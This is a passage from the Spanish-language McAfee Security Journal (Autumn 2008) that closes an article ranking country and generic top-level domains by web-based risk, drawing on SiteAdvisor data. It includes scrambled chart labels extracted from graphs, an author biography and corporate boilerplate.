prevalencia de ataques basados en la Web. Finalmente, hemos aislado los veinte principales dominios de nivel superior para cada tipo de riesgo. Los resultados son asombrosos. El riesgo no se reparte equitativamente en toda la red, como muestran los datos con claridad. Los dominios genéricos y de países muestran distintos tipos y grados de riesgo y peligros. Algunos países tienen buenos hábitos en el correo electrónico pero demuestran malas prácticas en la gestión de las descargas. Otros han albergado ataques a vulnerabilidades o código malintencionado. Esperamos que estos resultados le sirvan de ayuda al navegar y no lo olvide: ¡mire bien a izquierda y derecha antes de cruzar la autopista de Internet!
Los gráficos En el gráfico “Dominios TLD en Europa, Oriente Medio y África clasificados por riesgo general”, observará que el dominio de Rumanía (.ro) ha registrado casi el siete por ciento. Esto significa que, según el software SiteAdvisor, McAfee ha descubierto que casi el siete por ciento de todos los sitios en ese dominio de nivel superior han sufrido una o varias de las amenazas que hemos incluido en el análisis: ataques a vulnerabilidades de navegadores, adware/spyware/troyanos/ virus, gran volumen de correo electrónico comercial, afiliación a otros sitios peligrosos, marketing agresivo a través de ventanas emergentes o revisiones y comentarios de la comunidad de SiteAdvisor. Cuanto más alta es la cifra, mayor es el riesgo para los usuarios. Además de una cifra general, proporcionamos la variación experimentada en cuanto al riesgo del año anterior. El gráfico de líneas muestra que en Rumanía el riesgo ha aumentado aproximadamente un 1 por ciento, mientras que en Eslovaquia, por ejemplo, ha disminuido un 3 por ciento aproximadamente. Los números positivos indican un aumento del riesgo en comparación con el año anterior; los porcentajes negativos indican una disminución del riesgo. David Marcus es director de investigación de seguridad y comunicaciones de McAfee Avert Labs. Contribuye a dar a conocer a los clientes de McAfee y a la gran comunidad de expertos las numerosas novedades fruto de las investigaciones de seguridad de Avert Labs. En la actualidad, Marcus es responsable de relaciones públicas, se encarga del contacto con los medios de comunicación, mantiene su liderazgo intelectual, actuando como administrador del blog McAfee Avert Labs Security Blog. Además es presentador de AudioParasitics—El podcast oficial de McAfee Avert Labs. También dirige todas las publicaciones de Avert Labs, incluida la revista McAfee Security Journal.
NOTA 1 http://www.mcafee.com/us/security_insights/archived/june_2008/si_jun1_08.html
44
McAFEE SECURITY JOURNAL
TLD clasificados de Europa, Oriente Medio y África clasificados por riesgo general 8,0%
Variación del riesgo entre 2007 y 2008 (en puntos)
6,0% 4,0%
Riesgo general en 2008
2,0% 0,0% -2,0% Finlandia .fi
Noruega .no
Islandia .is
Eslovenia .si
Irlanda .ie
Dinamarca .dk
Grecia .gr
Suecia .se
Yugoslavia .yu
Reino Unido .uk
Croacia .hr
Suráfrica .za
Holanda .nl
Austria .at
Portugal .pt
Lituania .lt
Estonia .ee
Israel .il
Alemania .de
Turquía .tr
Eslovaquia .sk
Suiza .ch
Bélgica .be
Hungría .hu
República Checa .cz
Letonia .lv
Polonia .pl
Italia .it
Francia .fr
Bulgaria .bg
Irán .ir
España .es
Unión Europea
Rusia .ru
Ucrania .ua
Rumanía .ro
-4,0%
TLD de Asia clasificados por riesgo general 20,0%
Variación del riesgo entre 2007 y 2008 (en puntos)
18,0% 16,0%
Riesgo general en 2008
14,0% 12,0% 10,0% 8,0% 6,0% 4,0% 2,0% 0,0% -2,0% -4,0% -6,0% -8,0%
Variación del riesgo entre 2007 y 2008 (en puntos)
2,0% 1,5%
Japón .jp
Australia .au
Singapur .sg
Nueva Zelanda .nz
Malasia .my
Indonesia .id
Vanuatu .us
Tailandia .th
Criterios de riesgo empleados para evaluar los TLD
TLD de América clasificados por riesgo general 2,5%
Niue .nu
Tokelau .tk
R. de China (Taiwán) .tw
Islas Navidad .cx
Vietnam .vn
Tonga .to
Tuvalu .tv
Corea del Sur .kr
India .in
Samona .ws
Islas Cocos (Keeling) .cc
Filipinas .ph
R.P de China .cn
Hong Kong .hk
-10,0%
Ataques a vulnerabilidades de navegadores
Riesgo general en 2008
1,0%
Adware/spyware/ troyanos/virus
0,5%
Gran volumen de correo electrónico comercial
0,0% -0,5% -1,0% Colombia .co
Venezuela .ve
Canadá .ca
Chile .cl
Méjico .mx
Brasil .br
Argentina .ar
Estados Unidos .us
-1,5%
Asociaciones con otros sitios de riesgo
Marketing agresivo con ventanas emergentes
Revisiones/comentarios de la comunidad de SiteAdvisor
OTOÑO 2008
45
46
McAFEE SECURITY JOURNAL
Hong Kong .hk
Comercial .com
Estados Unidos .us
Polonia .pl
Samoa .ws
Portugal .pt
Redes .net
India .in
Vietnam .vn
Ucrania .ua
Tonga .to
Croacia .hr
Islas Cocos (Keeling) .cc
Familias/Particulares .name
Empresas .biz
Rusia .ru
R.P de China .cn
Niue .nu
Información .info
Rumanía .ro
Letonia .lv
India .in
Bulgaria .bg
Unión Europea .eu
Croacia .hr
Eslovaquia .sk
Islas Cocos (Keeling) .cc
Tailandia .th
Ucrania .ua
Yugoslavia .yu
Samoa .ws
Comercial .com
R. de China (Taiwán) .tw
Empresas .biz
Corea del Sur .kr
Rusia .ru
Redes .net
Hong Kong .hk
R.P de China .cn
Información .info
Vietnam .vn
Israel .il
Letonia .lv
Islas Navidad .cx
Tokelau .tk
Estados Unidos .us
Comercial .com
Redes .net
Tuvalu .tv
Tonga .to
Islas Cocos (Keeling) .cc
Bélgica .be
Bulgaria .bg
Familias/Particulares .name
Italia .it
R.P de China .cn
Empresas .biz
Samoa .ws
Romania .ro
Información .info
20 TLD principales clasificados por riesgo de descarga
25,0%
20,0% Variación del riesgo entre 2007 y 2008 (en puntos)
15,0%
10,0% Riesgo general en 2008
5,0%
-5,0% 0,0%
TLP principales clasificados por prácticas de correo electrónico
70,0%
60,0% Variación del riesgo entre 2007 y 2008 (en puntos)
50,0%
40,0% Riesgo general en 2008
30,0%
20,0%
10,0%
0,0%
-10,0%
-20,0%
20 TLD principales clasificados por ataques (exploits)
1,2%
1,0% Variación del riesgo entre 2007 y 2008 (en puntos)
0,8%
0,6% Riesgo general en 2008
0,4%
0,2%
-0,2% 0,0%
-0,4%
OTOÑO 2008
47
McAfee, Inc. Avenida de Bruselas nº 22 Edificio Sauce 28108 Alcobendas Madrid www.mcafee.com/es
McAfee y/u otras marcas mencionadas en este documento son marcas comerciales registradas o marcas comerciales de McAfee, Inc. y/o sus empresas filiales en EE. UU. y/u otros países. El color rojo asociado a la seguridad es el distintivo de los productos de la marca McAfee. Todas las demás marcas comerciales, tanto registradas como no registradas, mencionadas en este documento son propiedad exclusiva de sus propietarios respectivos. © 2008 McAfee, Inc. Reservados todos los derechos.
48 McAFEE 5001_sec-jrnl_fall08
SECURITY JOURNAL